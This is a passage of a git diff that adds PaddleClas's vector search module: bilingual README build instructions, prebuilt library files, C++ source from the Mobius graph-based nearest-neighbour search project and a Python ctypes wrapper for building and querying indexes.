+Windows上首先需要安装gcc编译工具,推荐使用[TDM-GCC](https://jmeubank.github.io/tdm-gcc/articles/2020-03/9.2.0-release),进入官网之后,可以选择合适的版本进行下载。推荐下载[tdm64-gcc-10.3.0-2.exe](https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exe)。 + +下载完成之后,按照默认的安装步骤进行安装即可。这里有3点需要注意: +1. 向量检索模块依赖于openmp,因此在安装到`choose components`步骤的时候,需要勾选上`openmp`的安装选项,否则之后编译的时候会报错`libgomp.spec: No such file or directory`,[参考链接](https://github.com/dmlc/xgboost/issues/1027) +2. 安装过程中会提示是否需要添加到系统的环境变量中,这里建议勾选上,否则之后使用的时候还需要手动添加系统环境变量。 +3. Linux上的编译命令为`make`,Windows上为`mingw32-make`,这里需要区分一下。 + + +安装完成后,可以打开一个命令行终端,通过命令`gcc -v`查看gcc版本。 + +在该文件夹(deploy/vector_search)下,运行命令`mingw32-make`,即可生成`index.dll`库文件。如果希望重新生成`index.dll`文件,可以首先使用`mingw32-make clean`清除已经生成的缓存,再使用`mingw32-make`生成更新之后的库文件。 + +### 2.4 MacOS上编译生成库文件 + +运行下面的命令,安装gcc与g++: + +```shell +brew install gcc +``` +#### 注意: +1. 若提示 `Error: Running Homebrew as root is extremely dangerous and no longer supported...`, 参考该[链接](https://jingyan.baidu.com/article/e52e3615057a2840c60c519c.html)处理 +2. 若提示 `Error: Failure while executing; `tar --extract --no-same-owner --file...`, 参考该[链接](https://blog.csdn.net/Dawn510/article/details/117787358)处理 + +在安装之后编译后的可执行程序会被复制到/usr/local/bin下面,查看这个文件夹下的gcc: +``` +ls /usr/local/bin/gcc* +``` +可以看到本地gcc对应的版本号为gcc-11,编译命令如下: (如果本地gcc版本为gcc-9, 则相应命令修改为`CXX=g++-9 make`) +``` +CXX=g++-11 make +``` + +## 3. 快速使用 + + import numpy as np + from interface import Graph_Index + + # 随机产生样本 + index_vectors = np.random.rand(100000,128).astype(np.float32) + query_vector = np.random.rand(128).astype(np.float32) + index_docs = ["ID_"+str(i) for i in range(100000)] + + # 初始化索引结构 + indexer = Graph_Index(dist_type="IP") #支持"IP"和"L2" + indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test') + + # 查询 + scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100) + print(scores) + print(docs) + + # 保存与加载 + indexer.dump(index_path="test") + indexer.load(index_path="test") diff --git a/Smart_container/PaddleClas/deploy/vector_search/README_en.md b/Smart_container/PaddleClas/deploy/vector_search/README_en.md new file mode 100644 index 0000000..aecadfd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/README_en.md @@ -0,0 +1,97 @@ +# Vector search + +**Attention**: Due to the system adaptability problem, this retrieval algorithm will be abandoned in the new version. [faiss](https://github.com/facebookresearch/faiss) will be used in the new version. The use process of the overall retrieval system base will remain unchanged, but the yaml files for build indexes and retrieval will be modified. + +## 1. Introduction + +Some vertical domain recognition tasks (e.g., vehicles, commodities, etc.) require a large number of recognized categories, and often use a retrieval-based approach to obtain matching predicted categories by performing a fast nearest neighbor search with query vectors and underlying library vectors. The vector search module provides the basic approximate nearest neighbor search algorithm based on Baidu's self-developed Möbius algorithm, a graph-based approximate nearest neighbor search algorithm for maximum inner product search (MIPS). This module provides python interface, supports numpy and tensor type vectors, and supports L2 and Inner Product distance calculation. + +Details of the Mobius algorithm can be found in the paper.([Möbius Transformation for Fast Inner Product Search on Graph](http://research.baidu.com/Public/uploads/5e189d36b5cf6.PDF), [Code](https://github.com/sunbelbd/mobius)) + +## 2. Installation + +### 2.1 Use the provided library files directly + +This folder contains the compiled `index.so` (compiled under gcc8.2.0 for Linux) and `index.dll` (compiled under gcc10.3.0 for Windows), which can be used directly, skipping sections 2.2 and 2.3. + +If the library files are not available due to a low gcc version or an incompatible environment, you need to manually compile the library files under a different platform. + +**Note:** Make sure that C++ compiler supports the C++11 standard. + +### 2.2 Compile and generate library files on Linux + +Run the following command to install gcc and g++. + +``` +sudo apt-get update +sudo apt-get upgrade -y +sudo apt-get install build-essential gcc g++ +``` + +Check the gcc version by the command `gcc -v`. + +`make` can be operated directly. If you wish to regenerate the `index.so`, you can first use `make clean` to clear the cache, and then use `make` to generate the updated library file. + +### 2.3 Compile and generate library files on Windows + +You need to install gcc compiler tool first, we recommend using [TDM-GCC](https://jmeubank.github.io/tdm-gcc/articles/2020-03/9.2.0-release), you can choose the right version on the official website. We recommend downloading [tdm64-gcc-10.3.0-2.exe](https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exe). + +After the downloading, follow the default installation steps to install. There are 3 points to note here: + +1. The vector search module depends on openmp, so you need to check the `openmp` installation option when going on to `choose components` step, otherwise it will report an error `libgomp.spec: No such file or directory`, [reference link](https://github.com/dmlc/xgboost/issues/1027) +2. When being asked whether to add to the system environment variables, it is recommended to check here, otherwise you need to add the system environment variables manually later. +3. The compile command is `make` on Linux and `mingw32-make` on Windows, so you need to distinguish here. + +After installation, you can open a command line terminal and check the gcc version with the command `gcc -v`. + +Run the command `mingw32-make` to generate the `index.dll` library file under the folder (deploy/vector_search). If you want to regenerate the `index.dll` file, you can first use `mingw32-make clean` to clear the cache, and then use `mingw32-make` to generate the updated library file. + +### 2.4 Compile and generate library files on MacOS + +Run the following command to install gcc and g++: + +``` +brew install gcc +``` + +#### Caution: + +1. If prompted with `Error: Running Homebrew as root is extremely dangerous and no longer supported... `, refer to this [link](https://jingyan.baidu.com/article/e52e3615057a2840c60c519c.html) +2. If prompted with `Error: Failure while executing; tar --extract --no-same-owner --file... `, refer to this [link](https://blog.csdn.net/Dawn510/article/details/117787358). + +After installation the compiled executable is copied under /usr/local/bin, look at the gcc in this folder: + +``` +ls /usr/local/bin/gcc* +``` + +The local gcc version is gcc-11, and the compile command is as follows: (If the local gcc version is gcc-9, the corresponding command should be `CXX=g++-9 make`) + +``` +CXX=g++-11 make +``` + +## 3. Quick use + +``` +import numpy as np +from interface import Graph_Index + +# Random sample generation +index_vectors = np.random.rand(100000,128).astype(np.float32) +query_vector = np.random.rand(128).astype(np.float32) +index_docs = ["ID_"+str(i) for i in range(100000)] + +# Initialize index structure +indexer = Graph_Index(dist_type="IP") #support "IP" and "L2" +indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test') + +# Query +scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100) +print(scores) +print(docs) + +# Save and load +indexer.dump(index_path="test") +indexer.load(index_path="test") +``` diff --git a/Smart_container/PaddleClas/deploy/vector_search/__init__.py b/Smart_container/PaddleClas/deploy/vector_search/__init__.py new file mode 100644 index 0000000..4ee26df --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/__init__.py @@ -0,0 +1 @@ +from .interface import Graph_Index diff --git a/Smart_container/PaddleClas/deploy/vector_search/index.dll b/Smart_container/PaddleClas/deploy/vector_search/index.dll new file mode 100644 index 0000000..5d54753 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/vector_search/index.dll differ diff --git a/Smart_container/PaddleClas/deploy/vector_search/index.so b/Smart_container/PaddleClas/deploy/vector_search/index.so new file mode 100644 index 0000000..d58d4f7 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/vector_search/index.so differ diff --git a/Smart_container/PaddleClas/deploy/vector_search/interface.cc b/Smart_container/PaddleClas/deploy/vector_search/interface.cc new file mode 100644 index 0000000..4013668 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/interface.cc @@ -0,0 +1,266 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/main.cc + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include"src/data.h" +#include"src/graph.h" + +struct IndexContext{ + void* graph; + void* data; +}; + + +int topk = 0; +int display_topk = 1; +int build_idx_offset = 0; +int query_idx_offset = 0; + +void flush_add_buffer( + std::vector>>>& add_buffer, + GraphWrapper* graph){ + #pragma omp parallel for + for(int i = 0;i < add_buffer.size();++i){ + auto& idx = add_buffer[i].first; + auto& point = add_buffer[i].second; + graph->add_vertex_lock(idx,point); + } + add_buffer.clear(); +} + + +extern "C"{ +// for mobius IP index +void build_mobius_index(float* dense_mat,int row,int dim, int pq_size, double mobius_pow , const char* prefix){ + std::unique_ptr data; + std::unique_ptr data_original; + std::unique_ptr graph; + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + ++row; + data = std::unique_ptr(new Data(row,dim)); + graph = std::unique_ptr(new FixedDegreeGraph<3>(data.get())); + graph->set_construct_pq_size(pq_size); + + std::vector>>> add_buffer; + + ((FixedDegreeGraph<3>*)graph.get())->get_data()->mobius_pow = mobius_pow; + data_original = std::unique_ptr(new Data(row,dim)); + + std::vector> dummy_mobius_point; + for(int i = 0;i < dim;++i) + dummy_mobius_point.push_back(std::make_pair(i,0)); + + //idx += build_idx_offset; + + for(int i = 0;i < row - 1;++i){ + + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_mat[i * dim + j])); + + data_original->add(i,point); + data->add_mobius(i,point); + if(i < 1000){ + graph->add_vertex(i,point); + }else{ + add_buffer.push_back(std::make_pair(i,point)); + } + if(add_buffer.size() >= 1000000) + flush_add_buffer(add_buffer,graph.get()); + } + flush_add_buffer(add_buffer,graph.get()); + graph->add_vertex(row - 1,dummy_mobius_point); + data.swap(data_original); + + std::string str = std::string(prefix); + data->dump(str + ".data"); + graph->dump(str + ".graph"); + +} + +void load_mobius_index_prefix(int row,int dim,IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + + ++row; + Data* data = new Data(row,dim); + GraphWrapper* graph = new FixedDegreeGraph<1>(data); + + //idx += build_idx_offset; + data->load(str + ".data"); + graph->load(str + ".graph"); + + ((FixedDegreeGraph<1>*)graph)->search_start_point = row - 1; + ((FixedDegreeGraph<1>*)graph)->ignore_startpoint = true; + + index_context->graph = graph; + index_context->data = data; +} + +void save_mobius_index_prefix(IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + Data* data = (Data*)(index_context->data); + GraphWrapper* graph = (GraphWrapper*)(index_context->graph); + + data->dump(str + ".data"); + graph->dump(str + ".graph"); +} + +void search_mobius_index(float* dense_vec,int dim,int search_budget,int return_k, IndexContext* index_context,idx_t* ret_id,double* ret_score){ + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + Data* data = reinterpret_cast(index_context->data); + GraphWrapper* graph = reinterpret_cast(index_context->graph); + + + //auto flag = (data==NULL); + //std::cout<> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_vec[j])); + std::vector topN; + std::vector score; + graph->search_top_k_with_score(point,search_budget,topN,score); + for(int i = 0;i < topN.size() && i < return_k;++i){ + ret_id[i] = topN[i]; + ret_score[i] = score[i]; + } +} + + +// For L2 index +void build_l2_index(float* dense_mat,int row,int dim, int pq_size, const char* prefix){ + std::unique_ptr data; + std::unique_ptr graph; + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + data = std::unique_ptr(new Data(row,dim)); + graph = std::unique_ptr(new FixedDegreeGraph<3>(data.get())); + graph->set_construct_pq_size(pq_size); + + std::vector>>> add_buffer; + + for(int i = 0;i < row;++i){ + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_mat[i * dim + j])); + data->add(i,point); + if(i < 1000){ + graph->add_vertex(i,point); + }else{ + add_buffer.push_back(std::make_pair(i,point)); + } + if(add_buffer.size() >= 1000000) + flush_add_buffer(add_buffer,graph.get()); + } + flush_add_buffer(add_buffer,graph.get()); + + std::string str = std::string(prefix); + data->dump(str + ".data"); + graph->dump(str + ".graph"); + +} + +void load_l2_index_prefix(int row,int dim,IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + + Data* data = new Data(row,dim); + GraphWrapper* graph = new FixedDegreeGraph<3>(data); + + //idx += build_idx_offset; + + data->load(str + ".data"); + graph->load(str + ".graph"); + + index_context->graph = graph; + index_context->data = data; +} + +void save_l2_index_prefix(IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + Data* data = (Data*)(index_context->data); + GraphWrapper* graph = (GraphWrapper*)(index_context->graph); + + data->dump(str + ".data"); + graph->dump(str + ".graph"); +} + + + +void search_l2_index(float* dense_vec,int dim,int search_budget,int return_k, IndexContext* index_context,idx_t* ret_id,double* ret_score){ + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + Data* data = reinterpret_cast(index_context->data); + GraphWrapper* graph = reinterpret_cast(index_context->graph); + + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_vec[j])); + std::vector topN; + std::vector score; + graph->search_top_k_with_score(point,search_budget,topN,score); + for(int i = 0;i < topN.size() && i < return_k;++i){ +// printf("%d: (%zu, %f)\n",i,topN[i],score[i]); + ret_id[i] = topN[i]; + ret_score[i] = score[i]; + } +} + + +void release_context(IndexContext* index_context){ + delete (Data*)(index_context->data); + delete (GraphWrapper*)(index_context->graph); +} + +} // extern "C" + diff --git a/Smart_container/PaddleClas/deploy/vector_search/interface.py b/Smart_container/PaddleClas/deploy/vector_search/interface.py new file mode 100644 index 0000000..8dcd86f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/interface.py @@ -0,0 +1,272 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import ctypes +import paddle +import numpy.ctypeslib as ctl +import numpy as np +import os +import sys +import json +import platform + +from ctypes import * +from numpy.ctypeslib import ndpointer + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +winmode = None +if platform.system() == "Windows": + lib_filename = "index.dll" + if sys.version_info.minor >= 8: + winmode = 0x8 +else: + lib_filename = "index.so" +so_path = os.path.join(__dir__, lib_filename) +try: + if winmode is not None: + lib = ctypes.CDLL(so_path, winmode=winmode) + else: + lib = ctypes.CDLL(so_path) +except Exception as ex: + readme_path = os.path.join(__dir__, "README.md") + print( + f"Error happened when load lib {so_path} with msg {ex},\nplease refer to {readme_path} to rebuild your library." + ) + exit(-1) + + +class IndexContext(Structure): + _fields_ = [("graph", c_void_p), ("data", c_void_p)] + + +# for mobius IP index +build_mobius_index = lib.build_mobius_index +build_mobius_index.restype = None +build_mobius_index.argtypes = [ + ctl.ndpointer( + np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int, + ctypes.c_int, ctypes.c_double, ctypes.c_char_p +] + +search_mobius_index = lib.search_mobius_index +search_mobius_index.restype = None +search_mobius_index.argtypes = [ + ctl.ndpointer( + np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int, + ctypes.c_int, POINTER(IndexContext), ctl.ndpointer( + np.uint64, flags='aligned, c_contiguous'), ctl.ndpointer( + np.float64, flags='aligned, c_contiguous') +] + +load_mobius_index_prefix = lib.load_mobius_index_prefix +load_mobius_index_prefix.restype = None +load_mobius_index_prefix.argtypes = [ + ctypes.c_int, ctypes.c_int, POINTER(IndexContext), ctypes.c_char_p +] + +save_mobius_index_prefix = lib.save_mobius_index_prefix +save_mobius_index_prefix.restype = None +save_mobius_index_prefix.argtypes = [POINTER(IndexContext), ctypes.c_char_p] + +# for L2 index +build_l2_index = lib.build_l2_index +build_l2_index.restype = None +build_l2_index.argtypes = [ + ctl.ndpointer( + np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int, + ctypes.c_int, ctypes.c_char_p +] + +search_l2_index = lib.search_l2_index +search_l2_index.restype = None +search_l2_index.argtypes = [ + ctl.ndpointer( + np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int, + ctypes.c_int, POINTER(IndexContext), ctl.ndpointer( + np.uint64, flags='aligned, c_contiguous'), ctl.ndpointer( + np.float64, flags='aligned, c_contiguous') +] + +load_l2_index_prefix = lib.load_l2_index_prefix +load_l2_index_prefix.restype = None +load_l2_index_prefix.argtypes = [ + ctypes.c_int, ctypes.c_int, POINTER(IndexContext), ctypes.c_char_p +] + +save_l2_index_prefix = lib.save_l2_index_prefix +save_l2_index_prefix.restype = None +save_l2_index_prefix.argtypes = [POINTER(IndexContext), ctypes.c_char_p] + +release_context = lib.release_context +release_context.restype = None +release_context.argtypes = [POINTER(IndexContext)] + + +class Graph_Index(object): + """ + graph index + """ + + def __init__(self, dist_type="IP"): + self.dim = 0 + self.total_num = 0 + self.dist_type = dist_type + self.mobius_pow = 2.0 + self.index_context = IndexContext(0, 0) + self.gallery_doc_dict = {} + self.with_attr = False + assert dist_type in ["IP", "L2"], "Only support IP and L2 distance ..." + + def build(self, + gallery_vectors, + gallery_docs=[], + pq_size=100, + index_path='graph_index/', + append_index=False): + """ + build index + """ + if paddle.is_tensor(gallery_vectors): + gallery_vectors = gallery_vectors.numpy() + assert gallery_vectors.ndim == 2, "Input vector must be 2D ..." + + self.total_num = gallery_vectors.shape[0] + self.dim = gallery_vectors.shape[1] + + assert (len(gallery_docs) == self.total_num + if len(gallery_docs) > 0 else True) + + print("training index -> num: {}, dim: {}, dist_type: {}".format( + self.total_num, self.dim, self.dist_type)) + + if not os.path.exists(index_path): + os.makedirs(index_path) + + if self.dist_type == "IP": + build_mobius_index( + gallery_vectors, self.total_num, self.dim, pq_size, + self.mobius_pow, + create_string_buffer((index_path + "/index").encode('utf-8'))) + load_mobius_index_prefix( + self.total_num, self.dim, + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) + else: + build_l2_index( + gallery_vectors, self.total_num, self.dim, pq_size, + create_string_buffer((index_path + "/index").encode('utf-8'))) + load_l2_index_prefix( + self.total_num, self.dim, + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) + + self.gallery_doc_dict = {} + if len(gallery_docs) > 0: + self.with_attr = True + for i in range(gallery_vectors.shape[0]): + self.gallery_doc_dict[str(i)] = gallery_docs[i] + + self.gallery_doc_dict["total_num"] = self.total_num + self.gallery_doc_dict["dim"] = self.dim + self.gallery_doc_dict["dist_type"] = self.dist_type + self.gallery_doc_dict["with_attr"] = self.with_attr + + output_path = os.path.join(index_path, "info.json") + if append_index is True and os.path.exists(output_path): + with open(output_path, "r") as fin: + lines = fin.readlines()[0] + ori_gallery_doc_dict = json.loads(lines) + assert ori_gallery_doc_dict["dist_type"] == self.gallery_doc_dict[ + "dist_type"] + assert ori_gallery_doc_dict["dim"] == self.gallery_doc_dict["dim"] + assert ori_gallery_doc_dict["with_attr"] == self.gallery_doc_dict[ + "with_attr"] + offset = ori_gallery_doc_dict["total_num"] + for i in range(0, self.gallery_doc_dict["total_num"]): + ori_gallery_doc_dict[str(i + offset)] = self.gallery_doc_dict[ + str(i)] + + ori_gallery_doc_dict["total_num"] += self.gallery_doc_dict[ + "total_num"] + self.gallery_doc_dict = ori_gallery_doc_dict + with open(output_path, "w") as f: + json.dump(self.gallery_doc_dict, f) + + print("finished creating index ...") + + def search(self, query, return_k=10, search_budget=100): + """ + search + """ + ret_id = np.zeros(return_k, dtype=np.uint64) + ret_score = np.zeros(return_k, dtype=np.float64) + + if paddle.is_tensor(query): + query = query.numpy() + if self.dist_type == "IP": + search_mobius_index(query, self.dim, search_budget, return_k, + ctypes.byref(self.index_context), ret_id, + ret_score) + else: + search_l2_index(query, self.dim, search_budget, return_k, + ctypes.byref(self.index_context), ret_id, + ret_score) + + ret_id = ret_id.tolist() + ret_doc = [] + if self.with_attr: + for i in range(return_k): + ret_doc.append(self.gallery_doc_dict[str(ret_id[i])]) + return ret_score, ret_doc + else: + return ret_score, ret_id + + def dump(self, index_path): + + if not os.path.exists(index_path): + os.makedirs(index_path) + + if self.dist_type == "IP": + save_mobius_index_prefix( + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) + else: + save_l2_index_prefix( + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) + + with open(index_path + "/info.json", "w") as f: + json.dump(self.gallery_doc_dict, f) + + def load(self, index_path): + self.gallery_doc_dict = {} + + with open(index_path + "/info.json", "r") as f: + self.gallery_doc_dict = json.load(f) + + self.total_num = self.gallery_doc_dict["total_num"] + self.dim = self.gallery_doc_dict["dim"] + self.dist_type = self.gallery_doc_dict["dist_type"] + self.with_attr = self.gallery_doc_dict["with_attr"] + + if self.dist_type == "IP": + load_mobius_index_prefix( + self.total_num, self.dim, + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) + else: + load_l2_index_prefix( + self.total_num, self.dim, + ctypes.byref(self.index_context), + create_string_buffer((index_path + "/index").encode('utf-8'))) diff --git a/Smart_container/PaddleClas/deploy/vector_search/src/config.h b/Smart_container/PaddleClas/deploy/vector_search/src/config.h new file mode 100644 index 0000000..352d684 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/src/config.h @@ -0,0 +1,43 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/config.h + +#pragma once + + +typedef float value_t; +//typedef double dist_t; +typedef float dist_t; +typedef size_t idx_t; +typedef int UINT; + + +#define ACC_BATCH_SIZE 4096 +#define FIXED_DEGREE 31 +#define FIXED_DEGREE_SHIFT 5 + + +//for construction +#define SEARCH_DEGREE 15 +#define CONSTRUCT_SEARCH_BUDGET 150 diff --git a/Smart_container/PaddleClas/deploy/vector_search/src/data.h b/Smart_container/PaddleClas/deploy/vector_search/src/data.h new file mode 100644 index 0000000..ea65e70 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/src/data.h @@ -0,0 +1,365 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/data.h + +#pragma once + +#include +#include +#include + +#include"config.h" + +#define ZERO_EPS 1e-10 + +#define _SCALE_WORLD_DENSE_DATA + +#ifdef _SCALE_WORLD_DENSE_DATA +//dense data +class Data{ +private: + std::unique_ptr data; + size_t num; + size_t curr_num = 0; + int dim; + +public: + value_t mobius_pow = 2; + value_t max_ip_norm = 1; + value_t max_ip_norm2 = 1; + + Data(size_t num, int dim) : num(num),dim(dim){ + data = std::unique_ptr(new value_t[num * dim]); + memset(data.get(),0,sizeof(value_t) * num * dim); + } + + value_t* get(idx_t idx) const{ + return data.get() + idx * dim; + } + + template + dist_t ipwrap_l2_query_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + dist_t normu = 0; + for(int i = 0;i < dim;++i){ + auto diff = (*(pa + i) / max_ip_norm) - v[i]; + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + } + ret += 1 - normu / max_ip_norm2; + return ret; + } + + template + dist_t ipwrap_l2_build_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + dist_t normu = 0; + dist_t normv = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - v[i]; + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + normv += v[i] * v[i]; + } + dist_t wrap_termu = sqrt(1 - normu / max_ip_norm2); + dist_t wrap_termv = sqrt(1 - normv / max_ip_norm2); + dist_t diff_wrap = wrap_termu - wrap_termv; + ret = ret / max_ip_norm2 + diff_wrap * diff_wrap; + return ret; + } + + template + dist_t l2_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - v[i]; + ret += diff * diff; + } + return ret; + } + + template + dist_t negative_inner_prod_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + ret -= (*(pa + i)) * v[i]; + } + return ret; + } + + template + dist_t negative_cosine_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + ret += (*(pa + i)) * v[i]; + lena += (*(pa + i)) * (*(pa + i)); + lenv += v[i] * v[i]; + } + int sign = ret < 0 ? 1 : -1; +// return sign * (ret * ret / lena);// / lenv); + return sign * (ret * ret / lena / lenv); + } + + template + dist_t mobius_l2_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + lena += (*(pa + i)) * (*(pa + i)); + lenv += v[i] * v[i]; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + value_t modifier_v = pow(lenv,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + if(fabs(modifier_v) < ZERO_EPS) + modifier_v = 1; + for(int i = 0;i < dim;++i){ + value_t tmp = (*(pa + i)) / modifier_a - v[i] / modifier_v; + ret += tmp * tmp; + } + return ret; + } + + template + dist_t real_nn(T& v) const{ + dist_t minn = 1e100; + for(size_t i = 0;i < curr_num;++i){ + auto res = l2_distance(i,v); + if(res < minn){ + minn = res; + } + } + return minn; + } + + std::vector organize_point_mobius(const std::vector>& v){ + std::vector ret(dim,0); + value_t lena = 0; + for(const auto& p : v){ +// ret[p.first] = p.second; + lena += p.second * p.second; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + for(const auto& p : v){ + ret[p.first] = p.second / modifier_a; + } + return std::move(ret); + } + + std::vector organize_point(const std::vector>& v){ + std::vector ret(dim,0); + for(const auto& p : v){ + if(p.first >= dim) + printf("error %d %d\n",p.first,dim); + ret[p.first] = p.second; + } + return std::move(ret); + } + + value_t vec_sum2(const std::vector>& v){ + value_t ret = 0; + for(const auto& p : v){ + if(p.first >= dim) + printf("error %d %d\n",p.first,dim); + ret += p.second * p.second; + } + return std::move(ret); + } + + + void add(idx_t idx, std::vector>& value){ + //printf("adding %zu\n",idx); + //for(auto p : value) + // printf("%zu %d %f\n",idx,p.first,p.second); + curr_num = std::max(curr_num,idx); + auto p = get(idx); + for(const auto& v : value) + *(p + v.first) = v.second; + } + + void add_mobius(idx_t idx, std::vector>& value){ 